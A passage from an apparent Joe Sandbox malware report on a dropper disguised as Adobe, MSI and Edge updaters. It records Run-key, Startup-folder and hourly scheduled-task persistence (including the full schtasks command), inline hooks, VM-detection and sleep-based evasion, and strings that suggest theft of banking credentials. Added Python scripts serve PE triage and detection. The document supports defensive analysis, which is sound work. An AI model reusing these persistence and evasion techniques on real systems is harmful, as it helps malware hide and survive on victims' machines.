Source: oobeldr.exe.7.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.7.dr Static PE information: section name: .MPRESS2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF0156 push ebx; iretd 0_2_00AF0172
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE2E4 push cs; ret 0_2_00BFE2EB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCA2D2 push ss; iretd 0_2_00B7AF53
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B9062A push esi; ret 0_2_00B9064D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B90625 push esi; ret 0_2_00B9064D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC4D29 push ecx; retf 0_2_00AC4E22
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B674FC push ecx; ret 0_2_00B67503
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAB88B push ss; iretd 0_2_00AAB903
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B2B96C push edi; retf 0_2_00B2B9D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5FB21 push ecx; ret 0_2_00A5FB34
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B33DCB push es; ret 0_2_00B3859B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008F3F49 push ecx; ret 0_2_008F3F5C
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Code function: 7_2_006D50A5 push ebp; ret 7_2_00721C57
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file
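The static findings in this section (entry point inside `.vmp,,,2`, section names containing commas, a raw section of 0x37e000 bytes, and the dropped MPRESS binaries whose sections flip from ER on disk to EW once unpacked) are all plain section-table checks. The script below is an added example written for this page, not Joe Sandbox output and not code from the sample: it walks a PE header with only the Python standard library and emits the same class of findings, rendering section rights in the report's E/R/W notation. `.vmp` is the section-name prefix typical of VMProtect-packed binaries; the commas are the "special chars" the signature refers to. The header returned by `build_sample_pe` is a constructed, header-only stand-in that copies this sample's section layout, not the real file.

```python
import string
import struct

# IMAGE_SECTION_HEADER.Characteristics bits from the PE/COFF specification
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
SAFE_NAME_CHARS = set(string.ascii_letters + string.digits + "._$@")
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}
ONE_MIB = 0x100000


def parse_pe(data):
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = pe + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + i * 40                          # 40-byte section headers
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                         "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return entry_rva, sections


def rights(chars):
    """Render Characteristics the way the report does ('ER', 'EW', 'W', ...)."""
    return "".join(tag for tag, bit in (("E", SCN_EXECUTE), ("R", SCN_READ), ("W", SCN_WRITE)) if chars & bit)


def triage(data):
    """Return (name of the section holding the entry point, list of findings) for one PE image."""
    entry_rva, sections = parse_pe(data)
    findings, entry_section = [], None
    for s in sections:
        if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
        if any(c not in SAFE_NAME_CHARS for c in s["name"]):
            findings.append(f"section name with special chars: {s['name']!r}")
        if s["chars"] & SCN_WRITE and s["chars"] & SCN_EXECUTE:
            findings.append(f"writable and executable section: {s['name']} ({rights(s['chars'])})")
        if s["rawsize"] > ONE_MIB:
            findings.append(f"raw size {s['rawsize']:#x} > 1 MiB: {s['name']}")
        if s["vsize"] > ONE_MIB:
            findings.append(f"virtual size {s['vsize']:#x} > 1 MiB: {s['name']}")
    if entry_section is None:
        findings.append(f"entry point {entry_rva:#x} lies outside every section")
    elif entry_section not in STANDARD_CODE_SECTIONS:
        findings.append(f"entry point in non-standard section {entry_section!r}")
    return entry_section, findings


def build_sample_pe():
    """Constructed PE32 header (no section bodies) mirroring this report's static findings; not the real sample."""
    secs = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics
        (b".text", 0x1000, 0x1000, 0x1000, 0x400, SCN_READ | SCN_EXECUTE),
        (b".vmp,,,0", 0x1000, 0x2000, 0x1000, 0x1400, SCN_READ),
        (b".vmp,,,1", 0x10000, 0x3000, 0x1000, 0x2400, SCN_READ | SCN_WRITE),
        (b".vmp,,,2", 0x380000, 0x13000, 0x37e000, 0x3400, SCN_READ | SCN_WRITE | SCN_EXECUTE),
    ]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)                                      # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, 0x13000 + 0x10)            # entry point inside .vmp,,,2
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in secs)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    ep, fs = triage(build_sample_pe())
    print("entry point section:", ep)
    for f in fs:
        print(" -", f)
```

Run `triage` over the dropped MPRESS files and over a PE rebuilt from a process dump to reproduce the ER-versus-EW comparison the report makes. Note that section characteristics in a dump only differ from the file's if the unpacker rewrote the header; the protection actually in force on the pages has to be read from the live process (VirtualQuery) rather than from the header.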

Boot Survival

Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
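The three persistence mechanisms recorded above (an hourly scheduled task created with `/f /rl HIGHEST` pointing into C:\ProgramData, HKCU Run values, and a Startup-folder .lnk) are what a detection engineer would key on. The script below is an added example written for this page, not part of the Joe Sandbox report and not the sample's code: it applies those checks to a small set of constructed telemetry events. The schtasks command line and the Startup path are copied from the rows above; the Run value's data is assumed (the report shows only the value name, so the dropped AdobeUpdaterV2.exe path is a guess), and the HKLM row is a constructed benign control. The last function tests an observation about the instance suffixes: both 32-hex strings in the file and task names are the MD5 of a one-digit decimal ("2" and "9"), i.e. a build counter, not a per-victim identifier. Caveat on `/rl HIGHEST`: it grants the full administrator token without a UAC prompt only when the `/RU` account is an administrator; for a standard user it changes nothing.

```python
import hashlib
import re

USER_WRITABLE_ROOTS = ("c:\\programdata\\", "c:\\users\\")   # trees a non-admin user can replace at will


def _norm(path):
    return path.strip().strip('"').lower()


def in_user_writable(path):
    return any(_norm(path).startswith(root) for root in USER_WRITABLE_ROOTS)


def schtasks_arg(cmdline, flag):
    """Value following a schtasks switch, quoted or bare, case-insensitive (None if absent)."""
    m = re.search(r"(?i)(?:^|\s)" + re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def check_schtasks(cmdline):
    """T1053.005: task creation whose parameters look like implant persistence."""
    if not re.search(r"(?i)\bschtasks(\.exe)?\b.*\s/create\b", cmdline):
        return None
    tr, sc, rl = schtasks_arg(cmdline, "/tr"), schtasks_arg(cmdline, "/sc"), schtasks_arg(cmdline, "/rl")
    reasons = []
    if tr and in_user_writable(tr):
        reasons.append("task runs a binary from a user-writable directory")
    if sc and sc.upper() in ("MINUTE", "HOURLY"):
        reasons.append(f"tight re-launch schedule ({sc.upper()}) restarts the implant if it is killed")
    if rl and rl.upper() == "HIGHEST":
        reasons.append("/rl HIGHEST: full admin token without a UAC prompt if the account is an administrator")
    if re.search(r"(?i)\s/f(\s|$)", cmdline):
        reasons.append("/f silently overwrites an existing task of the same name")
    if not reasons:
        return None
    return {"technique": "T1053.005", "name": schtasks_arg(cmdline, "/tn"), "target": tr, "reasons": reasons}


def check_run_key(key, name, data):
    """T1547.001: Run/RunOnce value whose executable lives in a user-writable tree."""
    if not re.search(r"(?i)\\currentversion\\run(once)?$", key):
        return None
    m = re.match(r'"([^"]+)"|(\S+)', data.strip())        # executable part, quoted or first token
    exe = (m.group(1) or m.group(2)) if m else data
    if not in_user_writable(exe):
        return None
    return {"technique": "T1547.001", "name": name, "target": exe,
            "reasons": ["Run value launches a binary from a user-writable directory"]}


def check_startup_file(path):
    """T1547.001: anything new in the per-user Startup folder."""
    if "\\start menu\\programs\\startup\\" not in _norm(path):
        return None
    return {"technique": "T1547.001", "name": path.rsplit("\\", 1)[-1], "target": path,
            "reasons": ["new entry in the per-user Startup folder"]}


def instance_suffix_origin(suffix, limit=10000):
    """If a 32-hex suffix is MD5 of a small decimal counter, return that counter as a string, else None."""
    for n in range(limit):
        if hashlib.md5(str(n).encode()).hexdigest() == suffix.lower():
            return str(n)
    return None


# Constructed telemetry (see the lead-in for which fields are verbatim, assumed, or benign controls)
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r'schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST'},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c",
     "data": r"C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"},  # assumed
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk"},
    {"type": "registry", "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "SecurityHealth", "data": r"C:\Windows\system32\SecurityHealthSystray.exe"},  # benign control
]


def triage(events):
    findings = []
    for ev in events:
        if ev["type"] == "process":
            f = check_schtasks(ev["cmdline"])
        elif ev["type"] == "registry":
            f = check_run_key(ev["key"], ev["name"], ev["data"])
        else:
            f = check_startup_file(ev["path"])
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["technique"], f["name"], "->", f["target"])
        for r in f["reasons"]:
            print("   ", r)
    for suffix in ("45c48cce2e2d7fbdea1afc51c7c6ad26", "c81e728d9d4c2f636f067f89cc14862c"):
        print(suffix, "= md5(", instance_suffix_origin(suffix), ")")
```

The user-writable-root test is deliberately coarse: per-user installers (OneDrive, Teams, Discord) legitimately register Run values under AppData, so in production this check is a scoring signal to combine with the dropper's other behaviour, not a standalone alert.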

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 2FF0005 value: E9 2B BA EC 73 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 76EBBA30 value: E9 DA 45 13 8C Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 3000008 value: E9 8B 8E F0 73 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 76F08E90 value: E9 80 71 0F 8C Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 3020005 value: E9 8B 4D A5 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 75A74D90 value: E9 7A B2 5A 8D Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 3030005 value: E9 EB EB A5 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 75A8EBF0 value: E9 1A 14 5A 8D Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 3040005 value: E9 8B 8A E1 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 75E58A90 value: E9 7A 75 1E 8D Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 3050005 value: E9 2B 02 E3 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 6460 base: 75E80230 value: E9 DA FD 1C 8D Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
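The twelve "Memory written" rows above come in pairs and every written value starts with `E9`, a 5-byte near jump whose signed rel32 operand is relative to the next instruction (target = base + 5 + rel32). Decoding them shows the classic inline-hook layout: the write into a system-DLL address (0x76EBBA30, 0x76F08E90, ...) is the hook, jumping into a freshly allocated page at 0x02FF0000, 0x03000000 and so on; the write at offset 5 (or 8) of that page is the trampoline, jumping back to the hooked function just past the bytes the hook overwrote. PID 6460 is file.exe itself (the process-memory Yara match later in this report names it), so these are in-process hooks rather than hooks planted in a foreign process. The script below is an added example written for this page, not Joe Sandbox output or the sample's code: it parses the rows verbatim, resolves each jump, and pairs hooks with trampolines. The module map is an assumption, because the report does not list module base addresses; the 0x75000000-0x77000000 band is where the 32-bit system DLLs of this WoW64 process sit, and in a real investigation it would be replaced by the process's module list. The report does not show what code sits at the handler addresses, so the example stops at locating them.

```python
import re
import struct

# The twelve "Memory written" rows from this report, copied verbatim (PID 6460 is file.exe).
REPORT_ROWS = """
PID: 6460 base: 2FF0005 value: E9 2B BA EC 73
PID: 6460 base: 76EBBA30 value: E9 DA 45 13 8C
PID: 6460 base: 3000008 value: E9 8B 8E F0 73
PID: 6460 base: 76F08E90 value: E9 80 71 0F 8C
PID: 6460 base: 3020005 value: E9 8B 4D A5 72
PID: 6460 base: 75A74D90 value: E9 7A B2 5A 8D
PID: 6460 base: 3030005 value: E9 EB EB A5 72
PID: 6460 base: 75A8EBF0 value: E9 1A 14 5A 8D
PID: 6460 base: 3040005 value: E9 8B 8A E1 72
PID: 6460 base: 75E58A90 value: E9 7A 75 1E 8D
PID: 6460 base: 3050005 value: E9 2B 02 E3 72
PID: 6460 base: 75E80230 value: E9 DA FD 1C 8D
"""

# Assumed module map: the report gives no module bases, so the example treats this band
# (32-bit system DLLs in a WoW64 process) as "inside a loaded module".
ASSUMED_MODULE_RANGES = [(0x75000000, 0x77000000)]

ROW_RE = re.compile(r"PID: (\d+) base: ([0-9A-Fa-f]+) value: ((?:[0-9A-Fa-f]{2}\s?)+)")


def jmp_rel32_target(base, code):
    """Destination of a 5-byte `E9 rel32` near jmp written at `base` (32-bit address space)."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel = struct.unpack("<i", code[1:5])[0]      # rel32 is signed and relative to the next instruction
    return (base + 5 + rel) & 0xFFFFFFFF


def parse_rows(text):
    """Turn report rows into dicts with the decoded jump target (None if the bytes are not an E9 jmp)."""
    writes = []
    for pid, base, hexbytes in ROW_RE.findall(text):
        base = int(base, 16)
        code = bytes.fromhex(re.sub(r"\s", "", hexbytes))
        writes.append({"pid": int(pid), "base": base, "code": code, "target": jmp_rel32_target(base, code)})
    return writes


def in_module(addr, ranges):
    return any(lo <= addr < hi for lo, hi in ranges)


def pair_hooks(writes, ranges=ASSUMED_MODULE_RANGES, max_prologue=16):
    """Match each jmp written into a module (hook) with the jmp that returns past the stolen prologue (trampoline)."""
    hooks = [w for w in writes if w["target"] is not None and in_module(w["base"], ranges)]
    tramps = [w for w in writes if w["target"] is not None and not in_module(w["base"], ranges)]
    pairs = []
    for h in hooks:
        for t in tramps:
            stolen = t["target"] - h["base"]                      # bytes of the original function the hook replaced
            same_page = (t["base"] >> 12) == (h["target"] >> 12)  # handler and trampoline share one allocation
            if 5 <= stolen <= max_prologue and same_page:
                pairs.append({"hooked": h["base"], "stolen": stolen,
                              "trampoline": t["base"], "handler": h["target"]})
    return pairs


if __name__ == "__main__":
    for p in pair_hooks(parse_rows(REPORT_ROWS)):
        print(f"hook at {p['hooked']:#010x}: {p['stolen']} bytes saved at {p['trampoline'] - p['stolen']:#010x}, "
              f"trampoline jmp at {p['trampoline']:#010x}, handler at {p['handler']:#010x}")
```

Six pairs come out, with 5 stolen bytes in five cases and 8 in one (a prologue whose instruction boundary did not fall on 5). To name the hooked functions, resolve each `hooked` address against the process's module list and export table; to see what the hook does, dump the page at each `handler` address from the same process.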

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B6E2A2 rdtsc 0_2_00B6E2A2
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 8154 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 839 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9963 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\file.exe TID: 1988 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4404 Thread sleep time: -1002000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1988 Thread sleep time: -8154000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4404 Thread sleep time: -2517000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1988 Thread sleep time: -142000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2132 Thread sleep count: 9963 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2132 Thread sleep time: -2241675s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2132 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009833B0 CreateDirectoryA,FindFirstFileA, 0_2_009833B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009A3880 FindFirstFileA,GetLastError,CreateDirectoryA, 0_2_009A3880
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008F1F8C FindFirstFileExW,GetLastError, 0_2_008F1F8C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008F1FAC FindFirstFileExW, 0_2_008F1FAC
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 30000 Jump to behavior
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000000
Source: file.exe, 00000000.00000002.4445827728.00000000064E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.4445827728.00000000064E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}:
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2013029941.0000000001410000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000002.4444174900.0000000001406000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sik&ven_vmware&prod_vidi&1656f219&0&000000#{07f-11d0-94f2-00a0c91e
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000002.4445435690.0000000006090000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_1985C77F
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.4444174900.00000000013A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: file.exe, 00000000.00000003.2013029941.0000000001410000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000002.4445771652.0000000006425000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}A;MM;MSXE;L32WIN2.EXE;
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
